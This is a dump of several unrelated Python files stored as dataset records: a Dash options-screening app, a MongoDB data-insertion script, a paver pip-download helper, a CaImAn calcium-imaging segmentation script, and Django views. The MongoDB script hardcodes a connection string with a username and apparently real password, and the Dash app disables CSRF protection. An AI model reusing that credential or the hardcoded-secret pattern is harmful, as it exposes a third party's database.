url_base_pathname='/dash/gallery/volatility-surface', csrf_protect=False)\napp = dash.Dash(__name__)\n#server = app.server\n\nexternal_css = [\"https://fonts.googleapis.com/css?family=Overpass:300,300i\",\n \"https://cdn.rawgit.com/plotly/dash-app-stylesheets/dab6f937fd5548cebf4c6dc7e93a10ac438f5efb/dash-technical-charting.css\"]\n\nfor css in external_css:\n app.css.append_css({\"external_url\": css})\n\nif 'DYNO' in os.environ:\n app.scripts.append_script({\n 'external_url': 'https://cdn.rawgit.com/chriddyp/ca0d8f02a1659981a0ea7f013a378bbd/raw/e79f3f789517deec58f41251f7dbb6bee72c44ab/plotly_ga.js'\n })\n \n\ndef generate_table(dataframe):\n return html.Table(\n # Header\n [html.Tr([html.Th(col) for col in dataframe.columns])] +\n\n # Body\n [html.Tr([\n html.Td(dataframe.iloc[i][col]) for col in dataframe.columns\n ]) for i in range(len(dataframe))]\n )\n\n# Make app layout\napp.layout = html.Div(\n [\n html.Div([\n html.Img(\n src=\"http://fchen.info/wp-content/uploads/2016/10/fclogo2.png\",\n className='two columns',\n style={\n 'height': '60',\n 'width': '60',\n 'float': 'left',\n 'position': 'relative',\n },\n ),\n html.H1(\n 'Earnings Screening',\n className='eight columns',\n style={'text-align': 'center'}\n ),\n html.Img(\n src=\"https://s3-us-west-1.amazonaws.com/plotly-tutorials/logo/new-branding/dash-logo-by-plotly-stripe.png\",\n className='two columns',\n style={\n 'height': '60',\n 'width': '135',\n 'float': 'right',\n 'position': 'relative',\n },\n ),\n ],\n className='row'\n ),\n html.Hr(style={'margin': '0', 'margin-bottom': '5'}),\n \n ################# Input for Earnings DF Layout ########################\n html.Div([\n html.H4(\n 'Upcoming Earnings',\n className='twelve columns',\n style={'text-align': 'center'}\n ),\n ],\n className='row',\n style={'margin-bottom': '20'}\n ), \n \n html.Div([\n html.Div([\n html.Label('Starting Date:',\n style={'text-align': 'center'}),\n dcc.DatePickerSingle(\n id='startdate',\n date=dt.date.today(),\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='three columns',\n ),\n html.Div([\n html.Label('Days Forward:',\n style={'text-align': 'left'}),\n dcc.Slider(\n id='forward_days',\n marks={i: '{}'.format(i) for i in range(11)},\n min=0,\n max=10,\n step=1,\n value=0\n )\n ],\n className='six columns',\n style={'margin-bottom': '20'}\n ),\n html.Div([\n html.Label('Earnings Query:'),\n html.Button('Submit Earnings Query', id='earnings_query'),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='three columns',\n )\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n\t\t\n\t\thtml.Div([\n html.Div([\n html.Label('Max Strike Gap:'),\n dcc.Input(\n id='max_gap',\n type='number',\n value=5\n )\n ], \n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n html.Div([\n html.Label('DTE Threshold:'),\n dcc.Input(\n id='dte_thresh',\n type='number',\n value=5\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n html.Div([\n html.Label('Strike Filter Type:'),\n dcc.Input(\n id='strike_filter',\n type='text',\n value='bounds'\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n \n html.Div([\n html.Label('Moneyness Threshold:'),\n dcc.Input(\n id='money_thresh',\n type='number',\n value=0.1\n )\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n\t\t\thtml.Div([\n html.Label('Strike Adjustment:'),\n dcc.Input(\n id='bounds_adj',\n type='number',\n value=0,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n \n ################# Earnings DF Layout ########################\n html.Div([\n html.Button('Update Earnings Table', id='earnings_show'),\n dasht.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n id='e_table'\n ),\n html.Div(id='selected-indexes')\n ],\n className='row',\n style={'margin-bottom': '20',\n 'text-align': 'center'}\n ),\n \n ################# Input for Condors DF Layout ########################\n html.Div([\n html.H4(\n 'Potential Condors',\n className='twelve columns',\n style={'text-align': 'center'}\n ),\n ],\n className='row',\n style={'margin-bottom': '20'}\n ), \n \n \n html.Div([\n html.Div([\n html.Label('Delta Threshold:'),\n dcc.Input(\n id='delta_thresh',\n type='number',\n value=0.03\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n ),\n html.Div([\n html.Label('Minimum Premium:'),\n dcc.Input(\n id='minimum_prem',\n type='number',\n value=0.15,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n ),\n html.Div([\n html.Label('Risk Reward Threshold:'),\n dcc.Input(\n id='rr_thresh',\n type='number',\n value=0.2,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n )\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n \n ################# Condors DF Layout ########################\n \n html.Div([\n html.Button('Update Condors Table', id='condors_show'),\n dasht.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n id='c_table'\n ),\n html.Div(id='selected-indexes')\n ],\n className='row',\n style={'margin-bottom': '20',\n 'text-align': 'center'}\n ), \n \n # Temporary hack for live dataframe caching\n # 'hidden' set to 'loaded' triggers next callback\n html.P(\n hidden='',\n id='raw_container',\n style={'display': 'none'}\n )\n ],\n style={\n 'width': '85%',\n 'max-width': '1200',\n 'margin-left': 'auto',\n 'margin-right': 'auto',\n 'font-family': 'overpass',\n 'background-color': '#FFFFFF',\n 'padding': '40',\n 'padding-top': '20',\n 'padding-bottom': '20',\n },\n)\n\n# Cache raw data\n@app.callback(\n Output('raw_container', 'hidden'),\n [Input('earnings_query', 'n_clicks')],\n [State('startdate','date'),\n State('forward_days','value'),\n State('max_gap','value'),\n State('dte_thresh','value'),\n State('strike_filter','value'),\n State('money_thresh','value'),\n\t\t State('bounds_adj','value')])\ndef cache_earnings(n_clicks, startdate, fwd_days, maxgap, dtethresh,\n strikefilter, moneythresh, boundsadj):\n\n global earnings_df, condors_df\n start_date = dt.datetime.strptime(startdate, '%Y-%m-%d')\n earnings_df = earnings(start_date, fwd_days)\n \n condors_df = condor_screener(earnings_df, max_gap = maxgap, dte_thresh = dtethresh, \n money_thresh = moneythresh, delta_thresh = 0.03, \n minimum_prem = 0.1, bounds_adj = boundsadj, \n rr_thresh = 0.1, strike_filter = strikefilter)\n \n print('Loaded raw data')\n return 'loaded'\n\n\n@app.callback(\n Output('e_table', 'rows'), \n [Input('earnings_show', 'n_clicks')],\n [State('raw_container', 'hidden')])\ndef update_e_table(n_clicks, hidden):\n if hidden == 'loaded':\n return earnings_df.to_dict('records')\n\n@app.callback(\n Output('c_table', 'rows'), \n [Input('condors_show', 'n_clicks')],\n [State('raw_container', 'hidden'),\n\t\t State('delta_thresh','value'),\n State('minimum_prem','value'),\n State('rr_thresh','value')])\ndef update_c_table(n_clicks, hidden, deltathresh, \n minimumprem, rrthresh):\n if hidden == 'loaded':\n filtered_condors = condors_df[(abs(condors_df['Delta']) <= deltathresh) & \n (condors_df['Premium'] >= minimumprem) & \n (condors_df['RiskRewardRatio'] >= rrthresh)]\n return filtered_condors.to_dict('records')\n\nif __name__ == '__main__':\n app.server.run(port=8000, debug=True, threaded=True, use_reloader=False)\n #app.run_server(debug = True)", "sub_path": "Earnings Scanner/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 12657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dash.Dash", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "dash_html_components.Table", "line_number": 41, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 46, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 47, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 52, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 54, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 55, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 65, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_html_components.Hr", "line_number": 83, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 86, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 87, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 97, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 99, "usage_type": "call"}, {"api_name": "dash_core_components.DatePickerSingle", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 103, "usage_type": "attribute"}, {"api_name": "dash_html_components.Div", "line_number": 111, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 112, "usage_type": "call"}, {"api_name": "dash_core_components.Slider", "line_number": 114, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 126, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 127, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 128, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 140, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 141, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 142, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 154, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 155, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 156, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 167, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 168, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 169, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 181, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 182, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 183, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 194, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 195, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 196, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 213, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 214, "usage_type": "call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 215, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 224, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 232, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 233, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 244, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 245, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 246, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 247, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 258, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 259, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 260, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 271, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 272, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 273, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 291, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 292, "usage_type": "call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 293, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 302, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 311, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 345, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 345, "usage_type": "attribute"}, {"api_name": "dash.dependencies.Output", "line_number": 332, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 333, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 334, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 335, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 336, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 337, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 338, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 339, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 340, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 358, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 359, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 360, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 366, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 367, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 368, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 369, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 370, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 371, "usage_type": "call"}]} +{"seq_id": "486986209", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nimport json\n\ndef connection():\n \"\"\"\n This function connect to the MongoDB\n \"\"\"\n client = MongoClient('mongodb+srv://backend:WvtTqCuH3nNkS5SL@holmes.ieany.mongodb.net/')\n db = client.holmes\n\n return db\n\ndef insert():\n new_conecction = connection()\n\n sale = new_conecction.sale\n rent = new_conecction.rent\n\n #Get the JSON document with the Values\n with open(r'.\\json\\property_sale.json') as json_file:\n property_sale = json.load(json_file)\n\n with open(r'.\\json\\property_rent.json') as json_file:\n property_rent = json.load(json_file)\n\n #Insert objects into MongoDB\n try:\n #Delete the Mongo documents, just for Test purpose\n \"\"\" print('Cleaning the BD...')\n sale.delete_many({})\n rent.delete_many({}) \"\"\"\n\n #Insert new Values\n print('Inserting new values...')\n result = sale.insert_many(property_sale)\n print('Property for sale were successfully inserted in DB')\n\n result = rent.insert_many(property_rent)\n print('Property for rent were successfully inserted in DB')\n\n except NameError:\n print(f'No objects were inserted {NameError}')\n\ndef insert_cities(json):\n new_conecction = connection()\n\n cities = new_conecction.cities\n\n try:\n #Delete the Mongo documents, just for Test purpose\n print('Cleaning the BD...')\n cities.delete_many({})\n\n print('Inserting Cities')\n cities.insert_many(json)\n\n print('Cities were successfully inserted in DB')\n\n except NameError:\n print(f'No objects were inserted {NameError}')\n\nif __name__ == \"__main__\":\n insert()", "sub_path": "backend/ds/scraper/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 1702, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "363609930", "text": "# -*- coding: utf-8 -*-\n# ============================================================================\n# PAVER EXTENSION: Download dependencies with pip via requirements files\n# ============================================================================\n\"\"\"\nA paver extension that provides pip related tasks:\n - download dependent packages\n - build a local packages index for downloaded packages\n\nEXPECTED OPTIONS STRUCTURE:\n options.develop\n .requirements_files -- List of requirements files to use.\n .download_dir -- Directory for downloaded packages.\n\nREQUIRES:\n * paver >= 1.0.4\n * pip >= 1.1\n * pip2pi > 0.1.1 (for localpi)\n\nSEE ALSO:\n * http://www.blueskyonmars.com/projects/paver/\n * http://pypi.python.org/pypi/Paver/\n * http://pypi.python.org/pypi/pip/\n * http://pypi.python.org/pypi/pip2pi/\n\"\"\"\n\nfrom paver.easy import info, options, path, sh, task, call_task\n\n# ----------------------------------------------------------------------------\n# TASKS:\n# ----------------------------------------------------------------------------\n@task\ndef download_depends():\n \"\"\"Download all dependencies (python packages) with pip.\"\"\"\n download_dir = options.develop.download_dir\n info(\"DOWNLOAD ALL DEPENDENCIES: {0}/\".format(download_dir))\n pip_download(download_dir,\n requirements_files=options.develop.requirements_files)\n\n@task\ndef localpi():\n \"\"\"Make local package index (used by tox).\"\"\"\n download_dir = path(options.develop.download_dir)\n if not download_dir.exists():\n call_task(\"download_depends\")\n info(\"MAKE LOCAL PACKAGE-INDEX: {0}/\".format(download_dir))\n sh(\"dir2pi {download_dir}\".format(download_dir=download_dir))\n # -- ALTERNATIVE:\n # for reqs in requirement_files:\n # sh(\"pip2pi downloads -r {requirements}\".format(requirements=reqs))\n\n# ----------------------------------------------------------------------------\n# UTILS:\n# ----------------------------------------------------------------------------\ndef pip_download(download_dir, cmdopts=\"\", requirements_files=None):\n \"\"\"Download all dependencies with pip by using requirement files, etc.\"\"\"\n if not cmdopts and not requirements_files:\n assert False, \"Neither requirement_files nor cmdopts provided.\"\n\n # -- NORMAL-CASE:\n # NOTE: --exists-action option requires pip >= 1.1\n download_dir = path(download_dir)\n download_dir.makedirs()\n pip_download_cmd = \"pip install --no-install --exists-action=i\"\n pip_download_cmd += \" --download={0}\".format(download_dir)\n\n if requirements_files:\n # -- WITH REQUIREMENT FILES:\n for requirements_file in requirements_files:\n sh(\"{pip_download} {cmdopts} -r {requirements_file}\"\\\n .format(pip_download=pip_download_cmd, cmdopts=cmdopts,\n requirements_file=requirements_file))\n else:\n # -- NO REQUIREMENT FILES: Requirement in cmdopts, ala: argparse>=1.2\n assert cmdopts\n sh(\"{pip_download} {cmdopts}\".format(\n pip_download=pip_download_cmd, cmdopts=cmdopts))\n", "sub_path": "paver_ext/pip_download.py", "file_name": "pip_download.py", "file_ext": "py", "file_size_in_byte": 3100, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "paver.easy.options.develop", "line_number": 35, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 35, "usage_type": "name"}, {"api_name": "paver.easy.info", "line_number": 36, "usage_type": "call"}, {"api_name": "paver.easy.options.develop", "line_number": 38, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 38, "usage_type": "name"}, {"api_name": "paver.easy.task", "line_number": 32, "usage_type": "name"}, {"api_name": "paver.easy.path", "line_number": 43, "usage_type": "call"}, {"api_name": "paver.easy.options.develop", "line_number": 43, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 43, "usage_type": "name"}, {"api_name": "paver.easy.call_task", "line_number": 45, "usage_type": "call"}, {"api_name": "paver.easy.info", "line_number": 46, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 47, "usage_type": "call"}, {"api_name": "paver.easy.task", "line_number": 40, "usage_type": "name"}, {"api_name": "paver.easy.path", "line_number": 62, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 70, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "620380323", "text": "\"\"\"\nThis not a part of NeuroAnalysisTools\nrun it in an environment with caiman installed\nin command line\n\nfor example:\n>>> activate ciaman\n\"\"\"\n\nimport os\nimport glob\nimport numpy as np\nimport caiman as cm\nfrom caiman.source_extraction import cnmf as cnmf\nimport h5py\nfrom shutil import copyfile\n\n\"\"\"\nthe most relevant parameter is K.\nSmaller K gives less ROIs.\nBigger K gives more ROIs\n\"\"\"\n\ndef run():\n\n date_recorded = '200210'\n mouse_id = 'M504408'\n resolution = (512, 512)\n channel = 'green'\n data_folder_n = '110_LSVDGCUC_reorged'\n imaging_mode = '2p' # '2p' or 'deepscope'\n n_process = 4\n\n # ========================= caiman parameters for boutons ================================================\n # ============ sutter scope, zoom 4, 5 frames online average, 5 frames offline average ===================\n # fr = 2. # frame rate (Hz)\n # decay_time = 0.5 # approximate length of transient event in seconds\n gSig = (5, 5) # expected half size of neurons, (8, 8) for soma at zoom 2 on sutter scope\n p = 2 # order of AR indicator dynamics\n # min_SNR = 3 # minimum SNR for accepting new components\n # rval_thr = 0.80 # correlation threshold for new component inclusion\n # ds_factor = 1 # spatial downsampling factor (increases speed but may lose some fine structure)\n # gnb = 2 # number of background components\n # gSig = tuple(np.ceil(np.array(gSig) / ds_factor).astype('int')) # recompute gSig if downsampling is involved\n mot_corr = False # flag for online motion correction\n pw_rigid = False # flag for pw-rigid motion correction (slower but potentially more accurate)\n # max_shifts_online = np.ceil(10. / ds_factor).astype('int') # maximum allowed shift during motion correction\n # sniper_mode = True # flag using a CNN to detect new neurons (o/w space correlation is used)\n # init_batch = 200 # number of frames for initialization (presumably from the first file)\n expected_comps = 500 # maximum number of expected components used for memory pre-allocation (exaggerate here)\n # dist_shape_update = True # flag for updating shapes in a distributed way\n # min_num_trial = 10 # number of candidate components per frame\n K = 10 # initial number of components\n # epochs = 2 # number of passes over the data\n show_movie = False # show the movie with the results as the data gets processed\n\n method_init = 'sparse_nmf'\n do_merge = False\n ssub = 1\n tsub = 1\n alpha_snmf = 10e1\n rolling_sum = False\n rf = 256\n p_ssub = 1\n p_tsub = 1\n # Ain = None\n # method_deconvolution = 'oasis'\n border_pix = 0\n # ========================= caiman parameters for boutons ================================================\n\n\n curr_folder = os.path.dirname(os.path.realpath(__file__))\n\n c, dview, n_processes = cm.cluster.setup_cluster(backend='local', n_processes=n_process, single_thread=False)\n\n data_folder = r\"\\\\allen\\programs\\braintv\\workgroups\\nc-ophys\\Jun\\raw_data\\{}-{}-{}\" \\\n r\"\\{}\".format(date_recorded, mouse_id, imaging_mode, data_folder_n)\n\n\n plane_ns = [f for f in os.listdir(data_folder) if\n os.path.isdir(os.path.join(data_folder, f)) and\n f[:5] == 'plane']\n plane_ns.sort()\n print('planes:')\n print('\\n'.join(plane_ns))\n\n for plane_n in plane_ns:\n\n print('\\nsegmenting plane: {}'.format(plane_n))\n\n plane_folder = os.path.join(data_folder, plane_n, channel, 'corrected')\n os.chdir(plane_folder)\n\n fn = [f for f in os.listdir(plane_folder) if len(f) > 16 and f[-5:] == '.mmap']\n if len(fn) > 1:\n print('\\n'.join(fn))\n raise LookupError('more than one file found.')\n elif len(fn) == 0:\n raise LookupError('no file found.')\n else:\n fn = fn[0]\n\n fp = os.path.join(os.path.realpath(plane_folder), fn)\n\n params_dict = {'fnames': [fp],\n # 'fr': fr,\n # 'decay_time': decay_time,\n 'gSig': gSig,\n 'p': p,\n # 'min_SNR': min_SNR,\n # 'rval_thr': rval_thr,\n # 'ds_factor': ds_factor,\n # 'nb': gnb,\n 'motion_correct': mot_corr,\n # 'init_batch': init_batch,\n # 'init_method': 'bare',\n # 'normalize': True,\n 'expected_comps': expected_comps,\n # 'sniper_mode': sniper_mode,\n # 'dist_shape_update': dist_shape_update,\n # 'min_num_trial': min_num_trial,\n 'K': K,\n # 'epochs': epochs,\n # 'max_shifts_online': max_shifts_online,\n 'pw_rigid': pw_rigid,\n 'show_movie': show_movie,\n\n # testing parameters\n 'method_init': method_init,\n 'do_merge': do_merge,\n 'ssub': ssub,\n 'tsub': tsub,\n 'alpha_snmf': alpha_snmf,\n 'rolling_sum': rolling_sum,\n 'rf': rf,\n 'p_ssub': p_ssub,\n 'p_tsub': p_tsub,\n # 'Ain': Ain,\n # 'method_deconvolution': method_deconvolution,\n 'border_pix': border_pix\n }\n\n opts = cnmf.params.CNMFParams(params_dict=params_dict)\n\n cnm1 = cnmf.CNMF(n_process, params=opts, dview=dview)\n cnm1.fit_file(motion_correct=False)\n\n roi_num = cnm1.estimates.A.shape[1]\n print('saving ...')\n save_f = h5py.File('caiman_segmentation_results.hdf5', 'w')\n save_f.create_dataset('masks',\n data=np.array(cnm1.estimates.A.todense()).T.reshape((roi_num, resolution[0], resolution[1]),\n order='F'), compression='lzf')\n save_f.create_dataset('traces', data=cnm1.estimates.C)\n save_f.close()\n\n copyfile(os.path.join(plane_folder, 'caiman_segmentation_results.hdf5'),\n os.path.join(curr_folder, plane_n, 'caiman_segmentation_results.hdf5'))\n\n # %% STOP CLUSTER and clean up log files\n cm.stop_server(dview=dview)\n log_files = glob.glob('*_LOG_*')\n for log_file in log_files:\n os.remove(log_file)\n\n\nif __name__ == '__main__':\n run()\n\n", "sub_path": "NeuroAnalysisTools/scripts/analysis_pipeline_movie/old/caiman_segmentation_bouton_mmap.py", "file_name": "caiman_segmentation_bouton_mmap.py", "file_ext": "py", "file_size_in_byte": 6389, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 72, "usage_type": "call"}, {"api_name": "caiman.cluster.setup_cluster", "line_number": 74, "usage_type": "call"}, {"api_name": "caiman.cluster", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 92, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 103, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf.params.CNMFParams", "line_number": 143, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf.params", "line_number": 143, "usage_type": "attribute"}, {"api_name": "caiman.source_extraction.cnmf", "line_number": 143, "usage_type": "name"}, {"api_name": "caiman.source_extraction.cnmf.CNMF", "line_number": 145, "usage_type": "call"}, {"api_name": "caiman.source_extraction.cnmf", "line_number": 145, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 152, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "caiman.stop_server", "line_number": 161, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 162, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "562859722", "text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\nfrom .models import Informer\nfrom landing.cc_forms import SocialForm, EmailCollectForm\n\n# Create your views here.\nipg_slider_list = (\"Смех до слез!\",\n \"Повод собраться с друзьями!\",\n \"Рабы которые создают игры для тебя!\",\n \"Гарантия отличного вечера!\",\n \"Органы по отличной цене!\",\n \"Театр абсурда у тебя дома!\",\n \"Черный юмор в самом соку!\",\n \"Вечные поиски логотипа!\",\n )\nipg_navbar = ((\"Главная\", \"main_page\"),\n \"Игры\",\n (\"Партнеры\", \"partners_list\"),\n (\"Связь\", \"games-contact\")\n )\n\n\ndef info_view(request):\n # Responds for main game lister\n queryset = Informer.objects.all()\n # email forms\n email_collect_form = EmailCollectForm(request.POST or None)\n if request.method == 'POST':\n if email_collect_form.is_valid():\n instance = email_collect_form.save(commit=False)\n instance.save()\n messages.success(request, 'Спасибо!')\n return HttpResponseRedirect('/')\n else:\n email_collect_form = EmailCollectForm()\n\n context = {'obj_list': queryset,\n 'email_form': email_collect_form,\n 'title': 'Main',\n 'ipg_navbar': ipg_navbar,\n 'ipg_slider_list': ipg_slider_list,\n }\n return render(request, 'basetwo.html', context)\n\n\ndef games_contact_form(request):\n # here for header game list\n queryset = Informer.objects.all()\n # social form\n social_form = SocialForm(request.POST or None)\n if request.method == 'POST':\n if social_form.is_valid():\n instance = social_form.save(commit=False)\n instance.save()\n messages.success(request, 'Сообщение отправлено!')\n return HttpResponseRedirect('/contact/')\n else:\n social_form = SocialForm()\n\n context = {'social_form': social_form,\n 'obj_list': queryset,\n 'ipg_navbar': ipg_navbar,\n 'ipg_slider_list': ipg_slider_list,\n }\n return render(request, 'contact.html', context)\n\n", "sub_path": "landing/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "models.Informer.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Informer.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Informer", "line_number": 27, "usage_type": "name"}, {"api_name": "landing.cc_forms.EmailCollectForm", "line_number": 29, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 34, 